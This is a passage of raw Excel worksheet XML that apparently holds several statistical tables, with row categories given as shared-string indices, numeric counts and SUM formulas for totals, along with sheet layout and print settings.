      </c>
    </row>
    <row r="13" spans="1:12" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="113">
        <f t="shared" si="1"/>
        <v>0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8" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="113">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="C14" s="23"/>
      <c r="D14" s="23"/>
      <c r="E14" s="23"/>
      <c r="F14" s="23">
        <v>1</v>
      </c>
      <c r="G14" s="23"/>
      <c r="H14" s="23"/>
      <c r="I14" s="23"/>
      <c r="J14" s="23">
        <v>1</v>
      </c>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
    </row>
    <row r="15" spans="1:12" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="113">
        <f t="shared" si="1"/>
        <v>18</v>
      </c>
      <c r="C15" s="23">
        <v>2</v>
      </c>
      <c r="D15" s="23">
        <v>4</v>
      </c>
      <c r="E15" s="23">
        <v>5</v>
      </c>
      <c r="F15" s="23">
        <v>0</v>
      </c>
      <c r="G15" s="23">
        <v>0</v>
      </c>
      <c r="H15" s="23">
        <v>4</v>
      </c>
      <c r="I15" s="23">
        <v>0</v>
      </c>
      <c r="J15" s="23">
        <v>3</v>
      </c>
      <c r="K15" s="23">
        <v>0</v>
      </c>
      <c r="L15" s="23">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.7480314960629921" top="0.7874015748031497" bottom="0.5905511811023623" header="0.5118110236220472" footer="0.5118110236220472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8"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="4" topLeftCell="A8" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="M8" sqref="M8:M18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.625" style="0" customWidth="1"/>
    <col min="2" max="12" width="9.25390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="14.25">
      <c r="A1" s="185" t="s">
        <v>399</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
    </row>
    <row r="2" spans="1:12" ht="14.25">
      <c r="A2" s="15"/>
      <c r="B2" s="15"/>
      <c r="C2" s="15"/>
      <c r="D2" s="15"/>
      <c r="E2" s="15"/>
      <c r="F2" s="15"/>
      <c r="G2" s="15"/>
      <c r="H2" s="15"/>
      <c r="I2" s="15"/>
      <c r="J2" s="158" t="s">
        <v>325</v>
      </c>
      <c r="K2" s="158"/>
      <c r="L2" s="158"/>
    </row>
    <row r="3" spans="1:12" ht="21" customHeight="1">
      <c r="A3" s="49" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="50" t="s">
        <v>61</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>62</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="F3" s="51" t="s">
        <v>49</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>63</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>64</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>65</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>66</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="18.75" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:L4">SUM(B5:B18)</f>
        <v>5671</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>35</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>103</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>172</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>101</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>115</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>255</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>1010</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>2230</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>1000</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="18.75" customHeight="1">
      <c r="A5" s="45" t="s">
        <v>288</v>
      </c>
      <c r="B5" s="113">
        <f>SUM(C5:L5)</f>
        <v>0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8.75" customHeight="1">
      <c r="A6" s="45" t="s">
        <v>289</v>
      </c>
      <c r="B6" s="113">
        <f aca="true" t="shared" si="1" ref="B6:B18">SUM(C6:L6)</f>
        <v>0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8.75" customHeight="1">
      <c r="A7" s="45" t="s">
        <v>290</v>
      </c>
      <c r="B7" s="113">
        <f t="shared" si="1"/>
        <v>0</v>
      </c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3" ht="18.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B8" s="113">
        <f t="shared" si="1"/>
        <v>1853</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23">
        <v>8</v>
      </c>
      <c r="E8" s="23">
        <v>10</v>
      </c>
      <c r="F8" s="23">
        <v>0</v>
      </c>
      <c r="G8" s="23">
        <v>0</v>
      </c>
      <c r="H8" s="23">
        <v>75</v>
      </c>
      <c r="I8" s="23">
        <v>460</v>
      </c>
      <c r="J8" s="23">
        <v>300</v>
      </c>
      <c r="K8" s="23">
        <v>0</v>
      </c>
      <c r="L8" s="23">
        <v>1000</v>
      </c>
      <c r="M8" s="136">
        <v>1853</v>
      </c>
    </row>
    <row r="9" spans="1:13" ht="18.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B9" s="113">
        <f t="shared" si="1"/>
        <v>126</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23">
        <v>6</v>
      </c>
      <c r="E9" s="23">
        <v>10</v>
      </c>
      <c r="F9" s="23"/>
      <c r="G9" s="23">
        <v>60</v>
      </c>
      <c r="H9" s="23">
        <v>50</v>
      </c>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="136">
        <v>126</v>
      </c>
    </row>
    <row r="10" spans="1:13" ht="18.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B10" s="113">
        <f t="shared" si="1"/>
        <v>480</v>
      </c>
      <c r="C10" s="23">
        <v>14</v>
      </c>
      <c r="D10" s="23">
        <v>16</v>
      </c>
      <c r="E10" s="23">
        <v>10</v>
      </c>
      <c r="F10" s="23">
        <v>0</v>
      </c>
      <c r="G10" s="23">
        <v>0</v>
      </c>
      <c r="H10" s="23">
        <v>0</v>
      </c>
      <c r="I10" s="23">
        <v>120</v>
      </c>
      <c r="J10" s="23">
        <v>320</v>
      </c>
      <c r="K10" s="23">
        <v>0</v>
      </c>
      <c r="L10" s="23">
        <v>0</v>
      </c>
      <c r="M10" s="136">
        <v>480</v>
      </c>
    </row>
    <row r="11" spans="1:13" ht="18.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B11" s="113">
        <f t="shared" si="1"/>
        <v>63</v>
      </c>
      <c r="C11" s="23">
        <v>2</v>
      </c>
      <c r="D11" s="23">
        <v>10</v>
      </c>
      <c r="E11" s="23">
        <v>29</v>
      </c>
      <c r="F11" s="23">
        <v>22</v>
      </c>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="23"/>
      <c r="L11" s="23"/>
      <c r="M11" s="136">
        <v>63</v>
      </c>
    </row>
    <row r="12" spans="1:13" ht="18.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B12" s="113">
        <f t="shared" si="1"/>
        <v>300</v>
      </c>
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="23">
        <v>300</v>
      </c>
      <c r="K12" s="23"/>
      <c r="L12" s="23"/>
      <c r="M12" s="136">
        <v>300</v>
      </c>
    </row>
    <row r="13" spans="1:13" ht="18.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B13" s="113">
        <f t="shared" si="1"/>
        <v>169</v>
      </c>
      <c r="C13" s="23">
        <v>4</v>
      </c>
      <c r="D13" s="23">
        <v>5</v>
      </c>
      <c r="E13" s="23">
        <v>20</v>
      </c>
      <c r="F13" s="23">
        <v>20</v>
      </c>
      <c r="G13" s="23"/>
      <c r="H13" s="23"/>
      <c r="I13" s="23">
        <v>120</v>
      </c>
      <c r="J13" s="23"/>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="136">
        <v>169</v>
      </c>
    </row>
    <row r="14" spans="1:13" ht="18.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B14" s="113">
        <f t="shared" si="1"/>
        <v>391</v>
      </c>
      <c r="C14" s="23">
        <v>6</v>
      </c>
      <c r="D14" s="23">
        <v>28</v>
      </c>
      <c r="E14" s="23">
        <v>37</v>
      </c>
      <c r="F14" s="23"/>
      <c r="G14" s="23">
        <v>40</v>
      </c>
      <c r="H14" s="23">
        <v>80</v>
      </c>
      <c r="I14" s="23">
        <v>200</v>
      </c>
      <c r="J14" s="23"/>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
      <c r="M14" s="136">
        <v>391</v>
      </c>
    </row>
    <row r="15" spans="1:13" ht="18.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B15" s="113">
        <f t="shared" si="1"/>
        <v>729</v>
      </c>
      <c r="C15" s="23">
        <v>5</v>
      </c>
      <c r="D15" s="23">
        <v>24</v>
      </c>
      <c r="E15" s="23">
        <v>30</v>
      </c>
      <c r="F15" s="23">
        <v>20</v>
      </c>
      <c r="G15" s="23">
        <v>0</v>
      </c>
      <c r="H15" s="23">
        <v>0</v>
      </c>
      <c r="I15" s="23">
        <v>0</v>
      </c>
      <c r="J15" s="23">
        <v>0</v>
      </c>
      <c r="K15" s="23">
        <v>650</v>
      </c>
      <c r="L15" s="23">
        <v>0</v>
      </c>
      <c r="M15" s="136">
        <v>729</v>
      </c>
    </row>
    <row r="16" spans="1:13" ht="18.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B16" s="113">
        <f t="shared" si="1"/>
        <v>0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136">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:13" ht="18.75" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B17" s="113">
        <f t="shared" si="1"/>
        <v>431</v>
      </c>
      <c r="C17" s="23"/>
      <c r="D17" s="23"/>
      <c r="E17" s="23"/>
      <c r="F17" s="23">
        <v>21</v>
      </c>
      <c r="G17" s="23"/>
      <c r="H17" s="23"/>
      <c r="I17" s="23"/>
      <c r="J17" s="23">
        <v>410</v>
      </c>
      <c r="K17" s="23"/>
      <c r="L17" s="23"/>
      <c r="M17" s="136">
        <v>431</v>
      </c>
    </row>
    <row r="18" spans="1:13" ht="18.75" customHeight="1">
      <c r="A18" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B18" s="113">
        <f t="shared" si="1"/>
        <v>1129</v>
      </c>
      <c r="C18" s="23">
        <v>4</v>
      </c>
      <c r="D18" s="23">
        <v>6</v>
      </c>
      <c r="E18" s="23">
        <v>26</v>
      </c>
      <c r="F18" s="23">
        <v>18</v>
      </c>
      <c r="G18" s="23">
        <v>15</v>
      </c>
      <c r="H18" s="23">
        <v>50</v>
      </c>
      <c r="I18" s="23">
        <v>110</v>
      </c>
      <c r="J18" s="23">
        <v>900</v>
      </c>
      <c r="K18" s="23">
        <v>0</v>
      </c>
      <c r="L18" s="23">
        <v>0</v>
      </c>
      <c r="M18" s="136">
        <v>1129</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="J2:L2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.5511811023622047" top="0.7874015748031497" bottom="0.5905511811023623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8"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="7" topLeftCell="A8" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="F7" sqref="F7:P7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.875" style="0" customWidth="1"/>
    <col min="2" max="4" width="7.00390625" style="0" customWidth="1"/>
    <col min="5" max="5" width="9.25390625" style="0" customWidth="1"/>
    <col min="6" max="10" width="7.00390625" style="0" customWidth="1"/>
    <col min="11" max="16" width="9.375" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="14.25">
      <c r="A1" s="185" t="s">
        <v>400</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="162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70" t="s">
        <v>328</v>
      </c>
      <c r="O2" s="170"/>
      <c r="P2" s="170"/>
    </row>
    <row r="3" spans="1:16" ht="18.75" customHeight="1">
      <c r="A3" s="186" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="165" t="s">
        <v>239</v>
      </c>
      <c r="C3" s="166"/>
      <c r="D3" s="166"/>
      <c r="E3" s="166"/>
      <c r="F3" s="166"/>
      <c r="G3" s="166"/>
      <c r="H3" s="166"/>
      <c r="I3" s="166"/>
      <c r="J3" s="167"/>
      <c r="K3" s="165" t="s">
        <v>240</v>
      </c>
      <c r="L3" s="166"/>
      <c r="M3" s="166"/>
      <c r="N3" s="166"/>
      <c r="O3" s="166"/>
      <c r="P3" s="167"/>
    </row>
    <row r="4" spans="1:16" ht="21" customHeight="1">
      <c r="A4" s="187"/>
      <c r="B4" s="168" t="s">
        <v>241</v>
      </c>
      <c r="C4" s="168"/>
      <c r="D4" s="168"/>
      <c r="E4" s="168" t="s">
        <v>59</v>
      </c>
      <c r="F4" s="168"/>
      <c r="G4" s="168"/>
      <c r="H4" s="168" t="s">
        <v>242</v>
      </c>
      <c r="I4" s="168"/>
      <c r="J4" s="168"/>
      <c r="K4" s="168" t="s">
        <v>60</v>
      </c>
      <c r="L4" s="168"/>
      <c r="M4" s="168"/>
      <c r="N4" s="168"/>
      <c r="O4" s="168"/>
      <c r="P4" s="168"/>
    </row>
    <row r="5" spans="1:16" ht="24" customHeight="1">
      <c r="A5" s="187"/>
      <c r="B5" s="163" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="163" t="s">
        <v>12</v>
      </c>
      <c r="D5" s="163" t="s">
        <v>13</v>
      </c>
      <c r="E5" s="163" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="163" t="s">
        <v>12</v>
      </c>
      <c r="G5" s="163" t="s">
        <v>13</v>
      </c>
      <c r="H5" s="163" t="s">
        <v>10</v>
      </c>
      <c r="I5" s="163" t="s">
        <v>12</v>
      </c>
      <c r="J5" s="163" t="s">
        <v>13</v>
      </c>
      <c r="K5" s="165" t="s">
        <v>243</v>
      </c>
      <c r="L5" s="167"/>
      <c r="M5" s="189" t="s">
        <v>381</v>
      </c>
      <c r="N5" s="190"/>
      <c r="O5" s="165" t="s">
        <v>241</v>
      </c>
      <c r="P5" s="167"/>
    </row>
    <row r="6" spans="1:16" ht="24" customHeight="1">
      <c r="A6" s="188"/>
      <c r="B6" s="164"/>
      <c r="C6" s="164"/>
      <c r="D6" s="164"/>
      <c r="E6" s="164"/>
      <c r="F6" s="164"/>
      <c r="G6" s="164"/>
      <c r="H6" s="164"/>
      <c r="I6" s="164"/>
      <c r="J6" s="164"/>
      <c r="K6" s="50" t="s">
        <v>317</v>
      </c>
      <c r="L6" s="50" t="s">
        <v>318</v>
      </c>
      <c r="M6" s="50" t="s">
        <v>317</v>
      </c>
      <c r="N6" s="59" t="s">
        <v>318</v>
      </c>
      <c r="O6" s="59" t="s">
        <v>317</v>
      </c>
      <c r="P6" s="50" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="7" spans="1:16" ht="18.75" customHeight="1">
      <c r="A7" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B7" s="53">
        <f aca="true" t="shared" si="0" ref="B7:P7">SUM(B8:B18)</f>
        <v>5671</v>
      </c>
      <c r="C7" s="53">
        <f t="shared" si="0"/>
        <v>3854</v>
      </c>
      <c r="D7" s="53">
        <f t="shared" si="0"/>
        <v>1817</v>
      </c>
      <c r="E7" s="53">
        <f t="shared" si="0"/>
        <v>2081</v>
      </c>
      <c r="F7" s="53">
        <f t="shared" si="0"/>
        <v>1306</v>
      </c>
      <c r="G7" s="53">
        <f t="shared" si="0"/>
        <v>775</v>
      </c>
      <c r="H7" s="53">
        <f t="shared" si="0"/>
        <v>3590</v>
      </c>
      <c r="I7" s="53">
        <f t="shared" si="0"/>
        <v>2548</v>
      </c>
      <c r="J7" s="53">
        <f t="shared" si="0"/>
        <v>1042</v>
      </c>
      <c r="K7" s="53">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="L7" s="53">
        <f t="shared" si="0"/>
        <v>1041</v>
      </c>
      <c r="M7" s="53">
        <f t="shared" si="0"/>
        <v>65</v>
      </c>
      <c r="N7" s="53">
        <f t="shared" si="0"/>
        <v>4630</v>
      </c>
      <c r="O7" s="53">
        <f t="shared" si="0"/>
        <v>79</v>
      </c>
      <c r="P7" s="53">
        <f t="shared" si="0"/>
        <v>5671</v>
      </c>
    </row>
    <row r="8" spans="1:16" ht="18.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B8" s="120">
        <f>SUM(C8:D8)</f>
        <v>1853</v>
      </c>
      <c r="C8" s="120">
        <f>F8+I8</f>
        <v>1254</v>
      </c>
      <c r="D8" s="120">
        <f>G8+J8</f>
        <v>599</v>
      </c>
      <c r="E8" s="121">
        <f>SUM(F8:G8)</f>
        <v>1213</v>
      </c>
      <c r="F8" s="23">
        <v>843</v>
      </c>
      <c r="G8" s="23">
        <v>370</v>
      </c>
      <c r="H8" s="121">
        <f>SUM(I8:J8)</f>
        <v>640</v>
      </c>
      <c r="I8" s="23">
        <v>411</v>
      </c>
      <c r="J8" s="23">
        <v>229</v>
      </c>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23">
        <v>8</v>
      </c>
      <c r="N8" s="23">
        <v>1853</v>
      </c>
      <c r="O8" s="98">
        <f>SUM(K8,M8)</f>
        <v>8</v>
      </c>
      <c r="P8" s="98">
        <f>SUM(L8,N8)</f>
        <v>1853</v>
      </c>
    </row>
    <row r="9" spans="1:16" ht="18.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B9" s="114">
        <f aca="true" t="shared" si="1" ref="B9:B18">SUM(C9:D9)</f>
        <v>126</v>
      </c>
      <c r="C9" s="114">
        <f>SUM(F9,I9)</f>
        <v>67</v>
      </c>
      <c r="D9" s="114">
        <f>SUM(G9,J9)</f>
        <v>59</v>
      </c>
      <c r="E9" s="113">
        <f>SUM(F9:G9)</f>
        <v>44</v>
      </c>
      <c r="F9" s="23">
        <v>25</v>
      </c>
      <c r="G9" s="23">
        <v>19</v>
      </c>
      <c r="H9" s="113">
        <f>SUM(I9:J9)</f>
        <v>82</v>
      </c>
      <c r="I9" s="23">
        <v>42</v>
      </c>
      <c r="J9" s="23">
        <v>40</v>
      </c>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="23">
        <v>5</v>
      </c>
      <c r="N9" s="23">
        <v>126</v>
      </c>
      <c r="O9" s="98">
        <f>SUM(K9,M9)</f>
        <v>5</v>
      </c>
      <c r="P9" s="98">
        <f>SUM(L9,N9)</f>
        <v>126</v>
      </c>
    </row>
    <row r="10" spans="1:16" ht="18.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="1"/>
        <v>480</v>
      </c>
      <c r="C10" s="114">
        <f aca="true" t="shared" si="2" ref="C10:C18">SUM(F10,I10)</f>
        <v>419</v>
      </c>
      <c r="D10" s="114">
        <f aca="true" t="shared" si="3" ref="D10:D18">SUM(G10,J10)</f>
        <v>61</v>
      </c>
      <c r="E10" s="113">
        <f>SUM(F10:G10)</f>
        <v>128</v>
      </c>
      <c r="F10" s="23">
        <v>117</v>
      </c>
      <c r="G10" s="23">
        <v>11</v>
      </c>
      <c r="H10" s="113">
        <f>SUM(I10:J10)</f>
        <v>352</v>
      </c>
      <c r="I10" s="23">
        <v>302</v>
      </c>
      <c r="J10" s="23">
        <v>50</v>
      </c>
      <c r="K10" s="23">
        <v>0</v>
      </c>
      <c r="L10" s="23">
        <v>0</v>
      </c>
      <c r="M10" s="23">
        <v>10</v>
      </c>
      <c r="N10" s="23">
        <v>480</v>
      </c>
      <c r="O10" s="98">
        <f aca="true" t="shared" si="4" ref="O10:O17">SUM(K10,M10)</f>
        <v>10</v>
      </c>
      <c r="P10" s="98">
        <f aca="true" t="shared" si="5" ref="P10:P17">SUM(L10,N10)</f>
        <v>480</v>
      </c>
    </row>
    <row r="11" spans="1:16" ht="18.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B11" s="114">
        <f t="shared" si="1"/>
        <v>63</v>
      </c>
      <c r="C11" s="114">
        <f t="shared" si="2"/>
        <v>46</v>
      </c>
      <c r="D11" s="114">
        <f t="shared" si="3"/>
        <v>17</v>
      </c>
      <c r="E11" s="113">
        <f aca="true" t="shared" si="6" ref="E11:E18">SUM(F11:G11)</f>
        <v>44</v>
      </c>
      <c r="F11" s="23">
        <v>29</v>
      </c>
      <c r="G11" s="23">
        <v>15</v>
      </c>
      <c r="H11" s="113">
        <f aca="true" t="shared" si="7" ref="H11:H17">SUM(I11:J11)</f>
        <v>19</v>
      </c>
      <c r="I11" s="23">
        <v>17</v>
      </c>
      <c r="J11" s="23">
        <v>2</v>
      </c>
      <c r="K11" s="23"/>
      <c r="L11" s="23"/>
      <c r="M11" s="23">
        <v>6</v>
      </c>
      <c r="N11" s="23">
        <v>63</v>
      </c>
      <c r="O11" s="98">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="P11" s="98">
        <f t="shared" si="5"/>
        <v>63</v>
      </c>
    </row>
    <row r="12" spans="1:16" ht="18.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="1"/>
        <v>300</v>
      </c>
      <c r="C12" s="114">
        <f t="shared" si="2"/>
        <v>230</v>
      </c>
      <c r="D12" s="114">
        <f t="shared" si="3"/>
        <v>70</v>
      </c>
      <c r="E12" s="113">
        <f t="shared" si="6"/>
        <v>70</v>
      </c>
      <c r="F12" s="23">
        <v>30</v>
      </c>
      <c r="G12" s="23">
        <v>40</v>
      </c>
      <c r="H12" s="113">
        <f t="shared" si="7"/>
        <v>230</v>
      </c>
      <c r="I12" s="23">
        <v>200</v>
      </c>
      <c r="J12" s="23">
        <v>30</v>
      </c>
      <c r="K12" s="23"/>
      <c r="L12" s="23"/>
      <c r="M12" s="23">
        <v>1</v>
      </c>
      <c r="N12" s="23">
        <v>300</v>
      </c>
      <c r="O12" s="98">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="P12" s="98">
        <f t="shared" si="5"/>
        <v>300</v>
      </c>
    </row>
    <row r="13" spans="1:16" ht="18.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B13" s="114">
        <f t="shared" si="1"/>
        <v>169</v>
      </c>
      <c r="C13" s="114">
        <f t="shared" si="2"/>
        <v>140</v>
      </c>
      <c r="D13" s="114">
        <f t="shared" si="3"/>
        <v>29</v>
      </c>
      <c r="E13" s="113">
        <f t="shared" si="6"/>
        <v>29</v>
      </c>
      <c r="F13" s="23">
        <v>21</v>
      </c>
      <c r="G13" s="23">
        <v>8</v>
      </c>
      <c r="H13" s="113">
        <f t="shared" si="7"/>
        <v>140</v>
      </c>
      <c r="I13" s="23">
        <v>119</v>
      </c>
      <c r="J13" s="23">
        <v>21</v>
      </c>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="23">
        <v>6</v>
      </c>
      <c r="N13" s="23">
        <v>169</v>
      </c>
      <c r="O13" s="98">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="P13" s="98">
        <f t="shared" si="5"/>
        <v>169</v>
      </c>
    </row>
    <row r="14" spans="1:16" ht="18.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="1"/>
        <v>391</v>
      </c>
      <c r="C14" s="114">
        <f t="shared" si="2"/>
        <v>111</v>
      </c>
      <c r="D14" s="114">
        <f t="shared" si="3"/>
        <v>280</v>
      </c>
      <c r="E14" s="113">
        <f t="shared" si="6"/>
        <v>140</v>
      </c>
      <c r="F14" s="23">
        <v>50</v>
      </c>
      <c r="G14" s="23">
        <v>90</v>
      </c>
      <c r="H14" s="113">
        <f t="shared" si="7"/>
        <v>251</v>
      </c>
      <c r="I14" s="23">
        <v>61</v>
      </c>
      <c r="J14" s="23">
        <v>190</v>
      </c>
      <c r="K14" s="23">
        <v>13</v>
      </c>
      <c r="L14" s="23">
        <v>391</v>
      </c>
      <c r="M14" s="23"/>
      <c r="N14" s="23"/>
      <c r="O14" s="98">
        <f t="shared" si="4"/>
        <v>13</v>
      </c>
      <c r="P14" s="98">
        <f t="shared" si="5"/>
        <v>391</v>
      </c>
    </row>
    <row r="15" spans="1:16" ht="18.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="1"/>
        <v>729</v>
      </c>
      <c r="C15" s="114">
        <f t="shared" si="2"/>
        <v>362</v>
      </c>
      <c r="D15" s="114">
        <f t="shared" si="3"/>
        <v>367</v>
      </c>
      <c r="E15" s="113">
        <f t="shared" si="6"/>
        <v>346</v>
      </c>
      <c r="F15" s="23">
        <v>157</v>
      </c>
      <c r="G15" s="23">
        <v>189</v>
      </c>
      <c r="H15" s="113">
        <f t="shared" si="7"/>
        <v>383</v>
      </c>
      <c r="I15" s="23">
        <v>205</v>
      </c>
      <c r="J15" s="23">
        <v>178</v>
      </c>
      <c r="K15" s="23">
        <v>1</v>
      </c>
      <c r="L15" s="23">
        <v>650</v>
      </c>
      <c r="M15" s="23">
        <v>9</v>
      </c>
      <c r="N15" s="23">
        <v>79</v>
      </c>
      <c r="O15" s="98">
        <f t="shared" si="4"/>
        <v>10</v>
      </c>
      <c r="P15" s="98">
        <f t="shared" si="5"/>
        <v>729</v>
      </c>
    </row>
    <row r="16" spans="1:16" ht="18.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="113">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="I16" s="23"/>
      <c r="J16" s="23"/>
      <c r="K16" s="23"/>
      <c r="L16" s="23"/>
      <c r="M16" s="23"/>
      <c r="N16" s="23"/>
      <c r="O16" s="98">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="P16" s="98">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:16" ht="18.75" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B17" s="114">
        <f t="shared" si="1"/>
        <v>431</v>
      </c>
      <c r="C17" s="114">
        <f t="shared" si="2"/>
        <v>244</v>
      </c>
      <c r="D17" s="114">
        <f t="shared" si="3"/>
        <v>187</v>
      </c>
      <c r="E17" s="113">
        <f t="shared" si="6"/>
        <v>67</v>
      </c>
      <c r="F17" s="23">
        <v>34</v>
      </c>
      <c r="G17" s="23">
        <v>33</v>
      </c>
      <c r="H17" s="113">
        <f t="shared" si="7"/>
        <v>364</v>
      </c>
      <c r="I17" s="23">
        <v>210</v>
      </c>
      <c r="J17" s="23">
